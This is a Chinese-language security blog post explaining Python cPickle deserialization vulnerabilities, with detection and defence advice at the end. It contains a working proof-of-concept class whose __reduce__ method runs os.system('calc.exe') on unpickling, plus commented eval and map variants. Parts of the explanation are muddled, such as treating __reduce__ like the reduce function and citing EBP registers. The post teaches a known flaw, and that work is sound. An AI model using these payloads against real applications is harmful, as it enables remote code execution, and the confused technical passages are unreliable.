<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> Python cPickle反序列化漏洞 · Mi1k7ea</title><meta name="description" content="Python cPickle反序列化漏洞 - Mi1k7ea"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/1.jpg"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="https://www.mi1k7ea.com/atom.xml" title="Mi1k7ea"></head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/1.jpg" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">MI1K7EA</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">归档</a></li><li class="nav-list-item"><a href="/tags/" target="_self" class="nav-list-link">分类</a></li><li class="nav-list-item"><a href="/about/" target="_self" class="nav-list-link">关于</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">Python cPickle反序列化漏洞</h1><div class="post-info">2019年1月1日</div><div class="post-content"><h2 id="基本概念"><a href="#基本概念" class="headerlink" title="基本概念"></a>基本概念</h2><p>Python中有个库可以实现序列化和反序列化操作，名为pickle或cPickle，作用和PHP的serialize与unserialize一样，两者只是实现的语言不同，一个是纯Python实现、另一个是C实现，函数调用基本相同，但cPickle库的性能更好，因此这里选用cPickle库作为示例。</p>
<p>cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数：</p>
<p>cPickle.dump()：将Python对象序列化保存到本地的文件中。</p>
<p>cPickle.load()：载入本地文件，将文件内容反序列化为Python对象。</p>
<p>cPickle.dumps()：将Python对象序列化为字符串。</p>
<p>cPickle.loads()：将字符串反序列化为Python对象。</p>
<p>简单示例：</p>
<p>先创建Person类对象并初始化，然后将其序列化并输出，可以看到是C解释过的内容：</p>
<p><img src="/2019/01/01/cPickle反序列化漏洞/1.jpg" alt=""></p>
<p>为了方便，直接在该代码下面添加反序列化操作：</p>
<p><img src="/2019/01/01/cPickle反序列化漏洞/2.jpg" alt=""></p>
<h2 id="Demo"><a href="#Demo" class="headerlink" title="Demo"></a>Demo</h2><p>还是用上面的示例，添加一个__reduce__()魔术方法：</p>
<p><img src="/2019/01/01/cPickle反序列化漏洞/3.jpg" alt=""></p>
<h2 id="漏洞根源分析"><a href="#漏洞根源分析" class="headerlink" title="漏洞根源分析"></a>漏洞根源分析</h2><p>漏洞产生的原因在于其可以将自定义的类进行序列化和反序列化。反序列化后产生的对象会在结束时触发__reduce__()函数从而触发恶意代码。</p>
<p>简单说明一下__reduce__()函数：将一个数据集合（链表，元组等）中的所有数据进行下列操作：用传给 reduce 中的函数 function（有两个参数）先对集合中的第 1、2 个元素进行操作，得到的结果再与第三个数据用 function 函数运算，最后得到一个结果。</p>
<p>由于cPickle是C写的代码且pickle与其实现原理一致，所以到$PYTHON_HOME/Lib/pickle.py中查看reduce加载的源码：</p>
<p><img src="/2019/01/01/cPickle反序列化漏洞/4.jpg" alt=""></p>
<p>通过调试可以发现，第1136行将当前栈内容赋值给stack变量，当前栈内容包含我们输入的恶意的os.system(“calc.txt”)内容，接着出栈赋值给args变量；通常函数返回地址都保存在当前EBP寄存器所指的上方，因此通过stack[-1]可以获取返回函数地址并赋值给func变量；最后调用func(*args)传入特定参数执行函数，从而完成对象的调用解析而执行任意命令。</p>
<h2 id="通用payload"><a href="#通用payload" class="headerlink" title="通用payload"></a>通用payload</h2><p>因为反序列化之后用到的库需要在反序列化的文件中存在，所以这里简单分为未导入和导入目标模块即这里为os模块的情况，当然除此之外还有其他一些系统执行库、其他的姿势等等，可自行补充，后面有空再补上吧：</p>
<p><img src="/2019/01/01/cPickle反序列化漏洞/5.jpg" alt=""></p>
<p>这里贴上测试代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> cPickle</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Person</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,username,password)</span>:</span></span><br><span class="line">        self.username = username </span><br><span class="line">        self.password = password </span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">    	<span class="comment"># 未导入os模块，通用</span></span><br><span class="line">    	<span class="keyword">return</span> (__import__(<span class="string">'os'</span>).system, (<span class="string">'calc.exe'</span>,))</span><br><span class="line">    	<span class="comment"># return eval,("__import__('os').system('calc.exe')",)</span></span><br><span class="line">    	<span class="comment"># return map, (__import__('os').system, ('calc.exe',))</span></span><br><span class="line">    	<span class="comment"># return map, (__import__('os').system, ['calc.exe'])</span></span><br><span class="line"></span><br><span class="line">    	<span class="comment"># 导入os模块</span></span><br><span class="line">        <span class="comment"># return (os.system, ('calc.exe',))</span></span><br><span class="line">        <span class="comment"># return eval, ("os.system('calc.exe')",)</span></span><br><span class="line">        <span class="comment"># return map, (os.system, ('calc.exe',))</span></span><br><span class="line">        <span class="comment"># return map, (os.system, ['calc.exe'])</span></span><br><span class="line"></span><br><span class="line">admin = Person(<span class="string">'admin'</span>,<span class="string">'123456'</span>)</span><br><span class="line">result = cPickle.dumps(admin)</span><br><span class="line"></span><br><span class="line">user = cPickle.loads(result)</span><br></pre></td></tr></table></figure>
<h2 id="检测方法"><a href="#检测方法" class="headerlink" title="检测方法"></a>检测方法</h2><p>全局搜索Python代码中是否含有关键字类似“import cPickle”或“import pickle”等，若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。</p>
<h2 id="防御方法"><a href="#防御方法" class="headerlink" title="防御方法"></a>防御方法</h2><p>1、用更高级的接口__getnewargs()、__getstate__()、__setstate__()等代替__reduce__()魔术方法；</p>
<p>2、进行反序列化操作之前，进行严格的过滤，若采用的是pickle库可采用装饰器实现。</p>
</div></article></div></main><footer><div class="paginator"><a href="/2019/01/01/PHP反序列化漏洞/" class="prev">上一篇</a><a href="/2019/01/01/通过DVWA学习DOM型XSS/" class="next">下一篇</a></div><div class="copyright"><p>© 2019 - 2020 <a href="https://www.mi1k7ea.com">Mi1k7ea</a>  |  <span id="busuanzi_container_site_uv">访客 <span id="busuanzi_value_site_uv"></span> </span>  |  <span id="busuanzi_container_site_pv">总访问量 <span id="busuanzi_value_site_pv"></span> 次</span></p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></body></html>